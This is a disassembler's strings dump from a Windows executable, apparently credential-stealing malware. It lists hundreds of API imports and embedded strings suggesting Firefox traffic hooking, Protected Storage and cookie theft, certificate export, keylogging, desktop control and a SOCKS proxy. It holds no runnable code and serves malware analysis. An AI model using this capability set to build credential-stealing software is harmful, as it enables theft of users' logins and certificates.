aGetcommandli_1 00421944

aGetcommtimeout 00421954 aGetcommstate 00421964

aGetcommpropert 00421974 aGetcommmodemst 00421988

aGetcommmask 0042199C

aGetcommconfig 004219A8 aGetcalendarinf 004219B8

aGetcalendari_0 004219CC

aGetcpinfoexw 004219E0

aGetcpinfoexa 004219F0

aGetcpinfo 00421A00

aGetbinarytypew 00421A0C aGetbinarytypea 00421A1C

aGetbinarytype 00421A2C

aGetatomnamew 00421A3C aGetatomnamea 00421A4C

aGetacp 00421A5C

aGenerateconsol 00421A64 aFreeresource 00421A80

aFreelibraryand 00421A90

aFreelibrary_0 00421AAC

aCoishandlercon 0041A2E0

aCoinitializese 0041A2F8 aCoinitializeex 0041A310

aCoinitialize 0041A320

aCoimpersonatec 0041A330 aCogettreatascl 0041A344

aCogetstandardm 0041A358

aCogetpsclsid 0041A370 aCogetobject 0041A380

aCogetmarshalsi 0041A38C

aCogetmalloc 0041A3A0 aCogetinterface 0041A3AC

aCogetinstancef 0041A3CC

aCogetinstanc_0 0041A3E8 aCogetcurrentpr 0041A400

aCogetcurrentlo 0041A414

aCogetclassobje 0041A430 aCogetcallertid 0041A444

aCogetcallconte 0041A454

aCofreeunusedli 0041A468

aCofreelibrary 0041A480

aCofreealllibra 0041A490

aCofiletimetodo 0041A4A4 aCofiletimenow 0041A4BC

aCodosdatetimet 0041A4CC

aCodisconnectob 0041A4E4 aCocreateinst_0 0041A4F8

aCocreateinst_1 0041A50C

aCocreateguid 0041A520 aCocreatefreeth 0041A530

aCocopyproxy 0041A550

aCobuildversion 0041A55C aCoaddrefserver 0041A56C

aClsidfromstr_0 0041A584

aClsidfromprogi 0041A594 aBindmoniker 0041A5A4

aWindowfrompoin 0041A5B0

aWindowfromdc 0041A5C0 aWinhelpw 0041A5D0

aWinhelpa 0041A5DC

aWaitmessage 0041A5E8 aWaitforinputid 0041A5F4

aWinnlsgetimeho 0041A608

aWinnlsgetenabl 0041A61C aWinnlsenableim 0041A634

aVkkeyscanw 0041A644

aVkkeyscanexw 0041A650 aVkkeyscanexa 0041A660

aVkkeyscana 0041A670

aValidatergn 0041A67C aValidaterect 0041A688

aUpdatewindow 0041A698 aUnregisterhotk 0041A6A8

aUnregisterdevi 0041A6BC

aUnregisterclas 0041A6DC aUnregistercl_0 0041A6F0

aUnpackddelpara 0041A704

aUnloadkeyboard 0041A714

aUnionrect 0041A72C

aUnhookwindowsh 0041A738

aUnhookwindow_0 0041A74C aUnhookwinevent 0041A760

aTranslatemes_0 0041A770

aTranslatemdisy 0041A784 aTranslateaccel 0041A79C

aTranslateacc_0 0041A7B4

aTranslateacc_1 0041A7CC aTrackpopupmenu 0041A7E4

aTrackpopupme_0 0041A7F8

aTrackmouseeven 0041A808

aFindfirstfreea 0041DE60

aEqualsid 0041DE74 aEqualprefixsid 0041DE80

aEnumservicesst 0041DE90

aEnumservices_0 0041DEA4 aEnumdependents 0041DEB8

aEnumdependen_0 0041DED0

aDuplicatetok_0 0041DEE8 aDuplicatetok_1 0041DEFC

aDestroyprivate 0041DF0C

aDeregistereven 0041DF2C aDeleteservice 0041DF44

aDeleteace 0041DF54

aCryptverifysig 0041DF60 aCryptverifys_0 0041DF78

aCryptsignhashw 0041DF90

aCryptsignhasha 0041DFA0 aCryptsetprovid 0041DFB0

aCryptsetprov_0 0041DFC4

aCryptsetprov_1 0041DFD8

aCryptsetprov_2 0041DFEC

aCryptsetprovpa 0041E000

aCryptsetkeypar 0041E014 aCryptsethashpa 0041E028

aCryptrelease_0 0041E03C

aCryptimportkey 0041E050 aCrypthashsessi 0041E060

aCrypthashdat_0 0041E074

aCryptgetuserke 0041E084 aCryptgetprovpa 0041E094

aCryptgetkeypar 0041E0A8

aCryptgethash_0 0041E0BC aCryptgetdefaul 0041E0D0

aCryptgetdefa_0 0041E0EC

aCryptgenrandom 0041E108 aCryptgenkey 0041E118

aCryptexportkey 0041E124

aCryptenumprovi 0041E134 aCryptenumpro_0 0041E148

aCryptenumpro_1 0041E15C

aCryptenumpro_2 0041E174 aCryptencrypt 0041E18C

aCryptduplicate 0041E19C

aCryptduplica_0 0041E1B0 aCryptdestroyke 0041E1C4

aCryptdestroy_0 0041E1D4

aCryptderivekey 0041E1E8 aCryptdecrypt 0041E1F8

aCryptcreateh_0 0041E208

aCryptcontextad 0041E218 aCryptacquire_0 0041E22C

aCryptacquire_1 0041E244 aCreateservicew 0041E25C

aCreateservicea 0041E26C

aCreateproces_0 0041E27C aCreateproces_1 0041E294

aCreateprivateo 0041E2AC

aCopysid 0041E2C8

aConvertsecurit 0041E2D0

aConvertsecur_0 0041E2F4

aConvertsecur_1 0041E31C aConvertsecur_2 0041E344

aConvertaccesst 0041E368

aConvertacces_0 0041E38C aControlservice 0041E3B0

aCloseserviceha 0041E3C0

aCloseeventlog 0041E3D4 aCleareventlogw 0041E3E4

aCleareventloga 0041E3F4

aChangeservicec 0041E404

aFreeenvironmen 00421AB8

aFreeenvironm_0 00421AD0 aFreeconsole 00421AE8

aFormatmessag_0 00421AF4

aFormatmessagea 00421B04 aFoldstringw 00421B14

aFoldstringa 00421B20

aFlushviewoffil 00421B2C aFlushinstructi 00421B3C

aFlushfilebuf_0 00421B54

aFlushconsolein 00421B68 aFindresource_0 00421B80

aFindresourceex 00421B90

aFindresource_1 00421BA0 aFindresourcea 00421BB0

aFindnextfile_0 00421BC0

aFindnextfilea 00421BD0 aFindnextchange 00421BE0

aFindfirstfil_0 00421BFC

aFindfirstfilee 00421C0C

aFindfirstfil_1 00421C20

aFindfirstfilea 00421C34

aFindfirstchang 00421C44 aFindfirstcha_0 00421C64

aFindclosechang 00421C84

aFindclose_0 00421CA0 aFindatomw 00421CAC

aFindatoma 00421CB8

aFillconsoleout 00421CC4 aFillconsoleo_0 00421CE0

aFillconsoleo_1 00421CFC

aFiletimetosyst 00421D18 aFiletimetolo_0 00421D30

aFiletimetodo_0 00421D48

aFatalexit 00421D60 aFatalappexitw 00421D6C

aFatalappexita 00421D7C

aExpandenviro_0 00421D8C aExpandenviro_1 00421DA8

aExitprocess_0 00421DC4

aEscapecommfunc 00421DD0 aErasetape 00421DE4

aEnumtimeformat 00421DF0

aEnumtimeform_0 00421E04 aEnumsystemloca 00421E18

aEnumsystemlo_0 00421E2C

aEnumsystemcode 00421E40 aEnumsystemco_0 00421E58

aEnumresourcety 00421E70

aEnumresource_0 00421E84 aEnumresourcena 00421E98

aEnumresource_1 00421EAC aEnumresourcela 00421EC0

aEnumresource_2 00421ED8

aEnumdateform_0 00421EF0 aEnumdateform_1 00421F04

aEnumdateformat 00421F18

aEnumdateform_2 00421F2C

aEnumcalendarin 00421F40

aEnumcalendar_0 00421F54

aEnumcalendar_1 00421F68 aEnumcalendar_2 00421F7C

aEndupdateresou 00421F90

aEndupdateres_0 00421FA4 aDuplicatehandl 00421FB8

aDosdatetimetof 00421FC8

aDisconnectna_0 00421FE0 aDisablethreadl 00421FF4

aDeviceiocontro 00422010

aDeletefilew_0 00422020

aTounicodeex 0041A818

aTounicode_0 0041A824 aToasciiex 0041A830

aToascii 0041A83C

aTilewindows 0041A844 aTilechildwindo 0041A850

aTabbedtextoutw 0041A864

aTabbedtextouta 0041A874 aSystemparamete 0041A884

aSystemparame_0 0041A89C

aSwitchtothiswi 0041A8B4 aSwitchdesktop 0041A8C8

aSwapmousebutto 0041A8D8

aSubtractrect 0041A8E8 aShowwindowasyn 0041A8F8

aShowwindow 0041A908

aShowscrollbar 0041A914 aHowownedpopups 0041A925

aShowcursor 0041A934

aShowcaret 0041A940

aSetwindowshook 0041A94C

aSetwindowsho_0 0041A95C

aSetwindowsho_1 0041A970 aSetwindowsho_2 0041A984

aSetwindowword 0041A994

aSetwindowtextw 0041A9A4 aSetwindowtexta 0041A9B4

aSetwindowrgn 0041A9C4

aSetwindowpos 0041A9D4 aSetwindowplace 0041A9E4

aSetwindowlongw 0041A9F8

aSetwindowlonga 0041AA08 aSetwindowconte 0041AA18

aSetwineventhoo 0041AA30

aSetuserobjects 0041AA40 aSetuserobjecti 0041AA58

aSetuserobjec_0 0041AA74

aSettimer 0041AA90 aSetthreaddes_0 0041AA9C

aSetsystemcurso 0041AAB0

aSetsyscolors 0041AAC0 aSetshellwindow 0041AAD0

aSetscrollrange 0041AAE0

aEtscrollpos 0041AAF1 aSetscrollinfo 0041AB00

aSetrectempty 0041AB10

aSetrect 0041AB20 aSetpropw 0041AB28

aSetpropa 0041AB34

aSetprocesswi_0 0041AB40 aEtprocessdefau 0041AB59

aSetparent 0041AB70 aSetmessagequeu 0041AB7C

aSetmessageextr 0041AB8C

aSetmenuiteminf 0041ABA0 aEtmenuiteminfo 0041ABB5

aSetmenuitembit 0041ABC8

aSetmenuinfo 0041ABDC

aSetmenudefault 0041ABE8

aSetmenucontext 0041ABFC

aSetmenu 0041AC14 aSetlasterrorex 0041AC1C

aSetkeyboardsta 0041AC2C

aSetforegroundw 0041AC40 aSetfocus 0041AC54

aSetdoubleclick 0041AC60

aSetdlgitemtext 0041AC74 aSetdlgitemte_0 0041AC84

aSetdlgitemint 0041AC94

aSetdeskwallpap 0041ACA4

aChangeservic_0 0041E41C

aCanceloverlapp 0041E434 aBuildtrusteewi 0041E44C

aBuildtrustee_0 0041E464

aBuildtrustee_1 0041E47C aBuildtrustee_2 0041E494

aBuildsecurityd 0041E4AC

aBuildsecurit_0 0041E4C8 aBuildimpersona 0041E4E4

aBuildimperso_0 0041E500

aBuildimperso_1 0041E51C aBuildimperso_2 0041E544

aBuildexplicita 0041E56C

aBuildexplici_0 0041E58C aBackupeventlog 0041E5AC

aBackupeventl_0 0041E5BC

aAreanyaccesses 0041E5CC aAreallaccesses 0041E5E4

aAllocatelocall 0041E5FC

aAllocateandini 0041E614

aAdjusttokenp_0 0041E630

aAdjusttokengro 0041E648

aAddauditaccess 0041E65C aAddace 0041E670

aAddaccessdenie 0041E678

aAddaccessallow 0041E68C aAccesscheckand 0041E6A0

aAccesschecka_0 0041E6BC

aAccesscheck 0041E6D8 aAbortsystemshu 0041E6E4

aAbortsystems_0 0041E6FC

aWvnsprintfw_0 0041E714 aWvnsprintfa_0 0041E720

aWnsprintfw_0 0041E72C

aWnsprintfa_0 0041E738 aUrlunescapew 0041E744

aUrlunescapea 0041E754

aUrlisw 0041E764 aUrlisopaquew 0041E76C

aUrlisopaquea 0041E77C

aUrlisnohistory 0041E78C aUrlisnohisto_0 0041E79C

aUrlisa 0041E7AC

aUrlhashw 0041E7B4 aUrlhasha 0041E7C0

aUrlgetpartw 0041E7CC

aUrlgetparta 0041E7D8 aUrlgetlocation 0041E7E4

aUrlgetlocati_0 0041E7F4

aUrlescapew 0041E804 aUrlescapea 0041E810

aUrlcreatefromp 0041E81C aUrlcreatefro_0 0041E830

aUrlcomparew 0041E844

aUrlcomparea 0041E850 aUrlcombinew 0041E85C

aUrlcombinea 0041E868

aUrlcanonicaliz 0041E874

aUrlcanonical_0 0041E888

aUrlapplyscheme 0041E89C

aUrlapplysche_0 0041E8AC aStrtrimw 0041E8BC

aStrtrima 0041E8C8

aStrtointw 0041E8D4 aStrtointexw 0041E8E0

aStrtointexa 0041E8EC

aStrtointa 0041E8F8 aStrstrw_0 0041E904

aStrstriw 0041E90C

aStrstria_0 0041E918

aDeletefilea 0042202C

aDeletefiber 00422038 aDeleteatom 00422044

aDefinedosdevic 00422050

aDefinedosdev_0 00422064 aDebugbreak 00422078

aDebugactivepro 00422084

aCreatewaitable 00422098 aCreatewaitab_0 004220B0

aCreatetoolhe_0 004220C8

aCreatethread_0 004220E4 aCreatetapepart 004220F4

aCreatesemaphor 00422108

aCreatesemaph_0 0042211C aCreateremote_0 00422130

aCreateproces_2 00422144

aCreateproces_3 00422154 aCreatepipe 00422164

aCreatenamedp_0 00422170

aCreatenamedp_1 00422184

aCreatemutexw_0 00422198

aCreatemutexa 004221A8

aCreatemailslot 004221B8 aCreatemailsl_0 004221C8

aCreateiocomple 004221D8

aCreatefilew_0 004221F0 aCreatefilema_0 004221FC

aCreatefilema_1 00422210

aCreatefilea 00422224 aCreatefiber 00422230

aCreateeventw_0 0042223C

aCreateeventa 0042224C aCreatedirect_0 0042225C

aCreatedirect_1 00422270

aCreatedirect_2 00422284 aCreatedirect_3 00422298

aCreateconsoles 004222AC

aCopyfilew_0 004222C8 aCopyfileexw 004222D4

aCopyfileexa 004222E0

aCopyfilea 004222EC aConvertthreadt 004222F8

aConvertdefault 00422310

aContinuedebuge 00422328 aConnectnamed_0 0042233C

aComparestringw 00422350

aComparestringa 00422360 aComparefiletim 00422370

aCommconfigdial 00422380

aCommconfigdi_0 00422394 aClosehandle_0 004223A8

aClearcommerror 004223B4 aClearcommbreak 004223C4

aCancelwaitable 004223D4

aCancelio 004223E8 aCanceldevicewa 004223F4

aCallnamedpipew 00422410

aCallnamedpipea 00422420

aBuildcommdcbw 00422430

aBuildcommdcban 00422440

aBuildcommdcb_0 0042245C aBuildcommdcba 00422478

aBeginupdateres 00422488

aBeginupdater_0 004224A0 aBeep 004224B8

aBackupwrite 004224C0

aBackupseek 004224CC aBackupread 004224D8

aArefileapisans 004224E4

aAllocconsole 004224F4

aSetdebugerrorl 0041ACB8

aSetcursorpos 0041ACCC aSetcursor 0041ACDC

aSetclipboardvi 0041ACE8

aSetclipboardda 0041ACFC aSetclassword 0041AD10

aSetclasslongw 0041AD20

aSetclasslonga 0041AD30 aSetcaretpos 0041AD40

aSetcaretblinkt 0041AD4C

aSetcapture 0041AD60 aSetactivewindo 0041AD6C

aSendnotifymess 0041AD7C

aSendnotifyme_0 0041AD90 aSendmessagew_0 0041ADA4

aSendmessagetim 0041ADB4

aSendmessaget_0 0041ADC8 aSendmessagecal 0041ADDC

aSendmessagec_0 0041ADF4

aSendmessagea 0041AE0C

aSendinput 0041AE1C

aSendimemessage 0041AE28

aSendimemessa_0 0041AE3C aSenddlgitemmes 0041AE50

aSenddlgitemm_0 0041AE64

aScrollwindowex 0041AE78 aScrollwindow 0041AE88

aScrolldc 0041AE98

aScreentoclient 0041AEA4 aReuseddelparam 0041AEB4

aReplymessage 0041AEC4

aRemovepropw 0041AED4 aRemovepropa 0041AEE0

aRemovemenu 0041AEEC

aReleasedc 0041AEF8 aReleasecapture 0041AF04

aRegisterwindow 0041AF14

aRegisterwind_0 0041AF2C aRegisterhotkey 0041AF44

aRegisterdevice 0041AF54

aRegisterdevi_0 0041AF70 aRegisterclipbo 0041AF8C

aRegisterclip_0 0041AFA8

aRegisterclassw 0041AFC4 aRegisterclasse 0041AFD4

aRegisterclas_0 0041AFE8

aRegisterclassa 0041AFFC aRedrawwindow 0041B00C

aRealgetwindowc 0041B01C

aRealchildwindo 0041B030 aPtinrect 0041B04C

aPostthreadmess 0041B058 aPostthreadme_0 0041B06C

aStrstra 0041E924

aStrspnw 0041E92C aStrspna 0041E934

aStrrettostrw 0041E93C

aStrrettostra 0041E94C aStrrettobufw 0041E95C

aStrrettobufa 0041E96C

aStrrstriw 0041E97C aStrrstria 0041E988

aStrrchrw 0041E994

aStrrchriw 0041E9A0 aStrrchria 0041E9AC

aStrrchra 0041E9B8

aStrpbrkw 0041E9C4 aStrpbrka 0041E9D0

aStrncatw 0041E9DC

aStrncata 0041E9E8 aStrisintlequal 0041E9F4

aStrisintlequ_0 0041EA04

aStrfromtimeint 0041EA14

aStrfromtimei_0 0041EA2C

aStrformatkbsiz 0041EA44

aStrformatkbs_0 0041EA58 aStrformatbytes 0041EA6C

aStrformatbyt_0 0041EA80

aStrformatbyt_1 0041EA94 aStrdupw 0041EAAC

aStrdupa 0041EAB4

aStrcpyw 0041EABC aStrcpynw 0041EAC4

aStrcmpw 0041EAD0

aStrcmpnw 0041EAD8 aStrcmpniw_0 0041EAE4

aStrcmpnia_0 0041EAF0

aStrcmpna 0041EAFC aStrcmpiw 0041EB08

aStrchrw 0041EB14

aStrchriw 0041EB1C aStrchria 0041EB28

aStrchra 0041EB34

aStrcatw 0041EB3C aStrcatbuffw 0041EB44

aStrcatbuffa 0041EB50

aStrcspnw 0041EB5C aStrcspniw 0041EB68

aStrcspnia 0041EB74

aStrcspna 0041EB80 aShstrdupw 0041EB8C

aShstrdupa 0041EB98

aShskipjunction 0041EBA4 aShsetvaluew 0041EBB4

aShsetvaluea 0041EBC0 aShsetthreadref 0041EBCC

aAddatomw 00422504

aAddatoma 00422510 String1 0042251C

aEntry 00422520

LibFileName 00422528 ProcName 00422538

aDans 0042254C

aRich 00422554 a_text 0042255C

a_rdata 00422564

a_data 0042256C aWritefile_1 00428776

aReadfile_1 00428782

aCreatefilew_1 0042878C aOpenmutexw_1 0042879A

aSetnamedpipe_1 004287A6

aHeaprealloc_0 004287C0 aMultibytetow_1 0042885C

aGetfilesizee_0 00428872

aCreatefilema_2 00428882

aSetfileattri_2 00428896

aCreatethread_1 004288AA

aClosehandle_1 004288B8 aSleep_1 004288C6

aGetmodulehan_2 004288CE

aLoadlibrarya_1 004288E0 aGetprocaddre_1 004288EE

aGetmodulefil_4 004288FE

aExitprocess_1 00428912 aLstrcmpia_1 00428920

aLstrcpyw_1 0042892C

aWidechartomu_1 00428936 aDeletefilew_1 0042894C

aCrypthashdat_1 0042895A

aCryptdestroy_1 0042896A aCryptcreateh_1 0042897C

aCryptgethash_1 0042898E

aCryptrelease_1 004289A2 aCryptacquire_2 004289B8

aGetsavefilenam 004289CE

aGetopenfilenam 004289E0 aOleinitializ_0 004289F2

aPathremovefi_2 00428A2C

aPathfindfile_2 00428A60 aPathcombinew_1 00428A74

aGetwindowtex_2 00428A82

aMessageboxw_0 00428A98 aCreatedialog_2 00428AFC

aGetdlgitem_1 00428B10

aSetwindowlon_0 00428B1C aGetdlgitemte_3 00428B2C

aS 00429028

Comment Strings:

.text:0040429C 0000002E C -!This program cannot be run in DOS

mode.\r\r\n$

.text:004046FC 0000000A C nspr4.dll

.text:00404708 00000009 C PR_Write

.text:00404714 00000011 C PopOpO03-3331111

.text:0040472C 0000000B C \nPath: %s\n

.text:00404738 00000007 C %s=%s\n

.text:00404768 00000015 C PStoreCreateInstance

.text:00404780 0000000C C pstorec.dll

.text:004047A4 0000000E C \nIE Cookies:\n

.text:004047B4 00000006 C Empty

.text:0041D120 0000001C C RegisterServiceCtrlHandlerA

.text:0041D13C 00000015 C RegisterEventSourceW

.text:0041D154 00000015 C RegisterEventSourceA

.text:0041D16C 0000000E C RegUnLoadKeyW

.text:0041D17C 0000000E C RegUnLoadKeyA

.text:0041D18C 0000000D C RegSetValueW

.text:0041D19C 0000000F C RegSetValueExW

.text:0041D1AC 0000000F C RegSetValueExA

.text:0041D1BC 0000000D C RegSetValueA

.text:0041D1CC 00000012 C RegSetKeySecurity

.text:0041D1E0 0000000C C RegSaveKeyW

.text:00405278 00000011 C TranslateMessage

.text:0040528C 0000000B C WSAConnect

.text:00405298 00000008 C connect

.text:004052A0 0000000C C closesocket

.text:004052AC 00000005 C send

.text:004052B4 0000000F C HttpQueryInfoW

.text:004052C4 0000000F C HttpQueryInfoA

.text:004052D4 00000014 C InternetCloseHandle

.text:004052E8 0000001B C InternetQueryDataAvailable

.text:00405304 00000014 C InternetReadFileExA

.text:00405318 00000014 C InternetReadFileExW

.text:0040532C 00000011 C InternetReadFile

.text:00405340 00000013 C HttpSendRequestExA

.text:00405354 00000013 C HttpSendRequestExW

.text:00405368 00000011 C HttpSendRequestA

.text:0040537C 00000011 C HttpSendRequestW

.text:00405390 00000015 C NtQueryDirectoryFile

.text:004053A8 00000017 C LdrGetProcedureAddress

.text:004053C0 0000000B C LdrLoadDll

.text:004053CC 0000000F C NtCreateThread

.text:004053EC 00000011 C 09ck_=ldfuihpfre

.text:00405400 00000011 C 3709128dk0023444

.text:0040541C 00000011 C !!!0-0=9-0=23434

.text:00405430 0000000B C Start Page

.text:0040543C 0000002A C software\\microsoft\\internet explorer\\main

.text:00405468 00000011 C ~23324m'm434dKkl

.text:0040547C 00000011 C 3208()_*09303333

.text:004054A8 00000005 C GET

.text:004054B0 00000006 C POST

.text:004054B8 00000008 C HTTP/1.

.text:004054C0 00000005 C Host

.text:004054C8 0000000F C PR_GetPeerName

.text:004054D8 00000008 C Referer

.text:004054E0 0000000D C Content-Type

.text:004054F0 00000016 C PR_GetNameForIdentity

.text:00405508 0000000A C NSS layer

.text:00405514 00000009 C https://

.text:00405520 00000008 C http://

.text:00405528 0000000C C %u.%u.%u.%u

.text:0040553C 00000005 C POST

.text:00405544 0000000F C GetProcAddress

.text:00405554 0000000D C LoadLibraryA

.text:00405564 00000011 C 0928394074595794

.text:00405578 00000011 C 809dslffsdfsdfgg

.text:0040558C 00000011 C M<,,>Keolkp90344

.text:004055A4 0000001C C Unknown command at line %u.

.text:004055C0 00000019 C Syntax error at line %u.

.text:004055DC 00000019 C Script already executed.

.text:004055F8 00000023 C Internal command error at line %u.

.text:00405694 00000006 C socks

.text:0040569C 00000011 C !213KJhndkmnihjd

.text:004056B0 00000009 C %s|%s|%s

.text:004056BC 0000000F C GetUserNameExW

.text:004056CC 00000013 C PFXExportCertStore

.text:004056E0 00000020 C CertDuplicateCertificateContext

.text:00405702 0000001D C rtDeleteCertificateFromStore

.text:00405720 00000014 C CertEnumSystemStore

.text:00405735 0000001B C ertEnumCertificatesInStore

.text:00405750 0000000F C CertCloseStore

.text:00405760 00000015 C CertOpenSystemStoreW

.text:00405778 00000010 C CLSIDFromString

.text:00405788 00000010 C StringFromGUID2

.text:00405798 00000011 C CoCreateInstance

.text:004057AC 0000000F C GetWindowTextW

.text:004057BC 0000000E C GetClassNameW

.text:004057CC 0000000F C GetWindowLongW

.text:004057DC 0000000D C SendMessageW

.text:004057EC 0000000E C FindWindowExW

.text:004057FC 00000010 C GetDlgItemTextW

.text:0040580C 00000010 C GetDlgItemTextA

.text:0041D1EC 0000000C C RegSaveKeyA

.text:0041D1F8 0000000F C RegRestoreKeyW

.text:0041D208 0000000F C RegRestoreKeyA

.text:0041D218 0000000F C RegReplaceKeyW

.text:0041D228 0000000F C RegReplaceKeyA

.text:0041D238 0000000F C RegQueryValueW

.text:0041D248 00000011 C RegQueryValueExW

.text:0041D25C 00000011 C RegQueryValueExA

.text:0041D270 0000000F C RegQueryValueA

.text:0041D280 00000018 C RegQueryMultipleValuesW

.text:0041D298 00000018 C RegQueryMultipleValuesA

.text:0041D2B0 00000011 C RegQueryInfoKeyW

.text:0041D2C4 00000011 C RegQueryInfoKeyA

.text:0041D2D8 0000000C C RegOpenKeyW

.text:0041D2E4 0000000E C RegOpenKeyExW

.text:0041D2F4 0000000E C RegOpenKeyExA

.text:0041D304 0000000C C RegOpenKeyA

.text:0041D310 00000018 C RegNotifyChangeKeyValue

.text:0041D328 0000000C C RegLoadKeyW

.text:0041D334 0000000C C RegLoadKeyA

.text:0041D340 00000012 C RegGetKeySecurity

.text:0041D354 0000000C C RegFlushKey

.text:0041D360 0000000E C RegEnumValueW

.text:0041D370 0000000E C RegEnumValueA

.text:0041D380 0000000C C RegEnumKeyW

.text:0041D38C 0000000E C RegEnumKeyExW

.text:0041D39C 0000000E C RegEnumKeyExA

.text:0041D3AC 0000000C C RegEnumKeyA

.text:0041D3B8 00000010 C RegDeleteValueW

.text:0041D3C8 00000010 C RegDeleteValueA

.text:0041D3D8 0000000E C RegDeleteKeyW

.text:0041D3E8 0000000E C RegDeleteKeyA

.text:0041D3F8 0000000E C RegCreateKeyW

.text:0041D408 00000010 C RegCreateKeyExW

.text:0041D418 00000010 C RegCreateKeyExA

.text:0041D428 0000000E C RegCreateKeyA

.text:0041D438 00000014 C RegConnectRegistryW

.text:0041D44C 00000014 C RegConnectRegistryA

.text:0041D460 0000000C C RegCloseKey

.text:0041D46C 0000000E C ReadEventLogW

.text:0041D47C 0000000E C ReadEventLogA

.text:0041D48C 00000013 C QueryServiceStatus

.text:0041D4A0 0000001B C QueryServiceObjectSecurity

.text:0041D4BC 00000018 C QueryServiceLockStatusW

.text:0041D4D4 00000018 C QueryServiceLockStatusA

.text:0041D4EC 00000014 C QueryServiceConfigW

.text:0041D500 00000014 C QueryServiceConfigA

.text:0041D514 0000001D C PrivilegedServiceAuditAlarmW

.text:0041D534 0000001D C PrivilegedServiceAuditAlarmA

.text:0041D554 0000000F C PrivilegeCheck

.text:0041D564 00000010 C OpenThreadToken

.text:0041D574 0000000D C OpenServiceW

.text:0041D584 0000000D C OpenServiceA

.text:0041D594 0000000F C OpenSCManagerW

.text:0041D5A4 0000000F C OpenSCManagerA

.text:0041D5B4 00000011 C OpenProcessToken

.text:0041D5C8 0000000E C OpenEventLogW

.text:0041D5D8 0000000E C OpenEventLogA

.text:0041D5E8 00000014 C OpenBackupEventLogW

.text:0041D5FC 00000014 C OpenBackupEventLogA

.text:0041D610 0000001B C ObjectPrivilegeAuditAlarmW

.text:0041D62C 0000001B C ObjectPrivilegeAuditAlarmA

.text:0041D648 00000016 C ObjectOpenAuditAlarmW

.text:0041D660 00000016 C ObjectOpenAuditAlarmA

.text:0041D678 00000018 C ObjectDeleteAuditAlarmW

.text:0041D690 00000018 C ObjectDeleteAuditAlarmA

.text:0041D6A8 00000017 C ObjectCloseAuditAlarmW

.text:0041D6C0 00000017 C ObjectCloseAuditAlarmA

.text:0041D6D8 00000015 C NotifyChangeEventLog

.text:0041D6F0 00000017 C NotifyBootConfigStatus

.text:0040581C 0000000B C GetDlgItem

.text:00405828 0000000C C GetIconInfo

.text:00405834 00000009 C DrawIcon

.text:00405840 0000000D C GetCursorPos

.text:00405850 0000000C C LoadCursorW

.text:0040585C 00000011 C SetThreadDesktop

.text:00405870 0000000D C CloseDesktop

.text:00405880 0000000D C OpenDesktopA

.text:00405890 00000018 C SetProcessWindowStation

.text:004058A8 00000013 C CloseWindowStation

.text:004058BC 00000013 C OpenWindowStationA

.text:004058D0 00000014 C GetForegroundWindow

.text:004058E4 00000019 C GetWindowThreadProcessId

.text:00405900 00000011 C DispatchMessageW

.text:00405914 0000001A C MsgWaitForMultipleObjects

.text:00405930 00000011 C GetKeyboardState

.text:00405944 0000000A C ToUnicode

.text:00405950 0000000C C GetKeyState

.text:0040595C 00000011 C DispatchMessageA

.text:00405970 0000000D C PeekMessageW

.text:00405980 0000000F C CharLowerBuffA

.text:00405990 0000000E C ExitWindowsEx

.text:004059A0 0000000B C CharToOemW

.text:004059AC 0000000B C CharUpperW

.text:004059B8 00000010 C WSAGetLastError

.text:004059C8 00000010 C WSASetLastError

.text:004059D8 00000007 C select

.text:004059E0 00000009 C WSAIoctl

.text:004059EC 00000005 C recv

.text:004059F4 00000009 C recvfrom

.text:00405A00 0000000C C getsockname

.text:00405A0C 0000000D C freeaddrinfo

.text:00405A1C 0000000C C getaddrinfo

.text:00405A28 00000009 C shutdown

.text:00405A34 0000000B C WSACleanup

.text:00405A40 0000000B C WSAStartup

.text:00405A4C 00000007 C accept

.text:00405A54 00000007 C listen

.text:00405A5C 00000005 C bind

.text:00405A64 00000007 C socket

.text:00405A6C 0000000C C getpeername

.text:00405A78 00000007 C sendto

.text:00405A80 0000000A C WSASendTo

.text:00405A8C 00000008 C WSASend

.text:00405A94 00000014 C CryptReleaseContext

.text:00405AA8 00000011 C CryptDestroyHash

.text:00405ABC 00000012 C CryptGetHashParam

.text:00405AD0 0000000E C CryptHashData

.text:00405AE0 00000010 C CryptCreateHash

.text:00405AF0 00000015 C CryptAcquireContextW

.text:00405B08 00000011 C DuplicateTokenEx

.text:00405B1C 00000015 C CreateProcessAsUserW

.text:00405B34 0000001A C SetSecurityDescriptorDacl

.text:00405B50 0000001D C InitializeSecurityDescriptor

.text:00405B70 0000000E C RegEnumKeyExW

.text:00405B80 00000010 C RegDeleteValueW

.text:00405B90 0000000F C RegSetValueExA

.text:00405BA0 0000000F C RegSetValueExW

.text:00405BB0 0000000C C RegCloseKey

.text:00405BBC 0000000E C RegOpenKeyExW

.text:00405BCC 00000010 C RegCreateKeyExA

.text:00405BDC 00000010 C RegCreateKeyExW

.text:00405BEC 00000011 C RegQueryValueExW

.text:00405C00 00000012 C LookupAccountSidW

.text:00405C14 00000014 C GetTokenInformation

.text:00405C28 00000011 C OpenProcessToken

.text:00405C3C 00000016 C AdjustTokenPrivileges

.text:00405C54 00000016 C LookupPrivilegeValueW

.text:00405C6C 0000000D C GetUserNameW

.text:00405C7C 00000015 C DeleteUrlCacheEntryW

.text:0041D708 0000000F C MapGenericMask

.text:0041D718 00000013 C MakeSelfRelativeSD

.text:0041D72C 0000000F C MakeAbsoluteSD

.text:0041D73C 0000001F C LookupSecurityDescriptorPartsW

.text:0041D75C 0000001F C LookupSecurityDescriptorPartsA

.text:0041D77C 00000016 C LookupPrivilegeValueW

.text:0041D794 00000016 C LookupPrivilegeValueA

.text:0041D7AC 00000015 C LookupPrivilegeNameW

.text:0041D7C4 00000015 C LookupPrivilegeNameA

.text:0041D7DC 0000001C C LookupPrivilegeDisplayNameW

.text:0041D7F8 0000001C C LookupPrivilegeDisplayNameA

.text:0041D814 00000012 C LookupAccountSidW

.text:0041D828 00000012 C LookupAccountSidA

.text:0041D83C 00000013 C LookupAccountNameW

.text:0041D850 00000013 C LookupAccountNameA

.text:0041D864 0000000B C LogonUserW

.text:0041D870 0000000B C LogonUserA

.text:0041D87C 00000014 C LockServiceDatabase

.text:0041D890 0000000B C IsValidSid

.text:0041D89C 0000001A C IsValidSecurityDescriptor

.text:0041D8B8 0000000B C IsValidAcl

.text:0041D8C4 0000000E C IsTextUnicode

.text:0041D8D4 00000018 C InitiateSystemShutdownW

.text:0041D8EC 00000018 C InitiateSystemShutdownA

.text:0041D904 0000000E C InitializeSid

.text:0041D914 0000001D C InitializeSecurityDescriptor

.text:0041D934 0000000E C InitializeAcl

.text:0041D944 00000010 C ImpersonateSelf

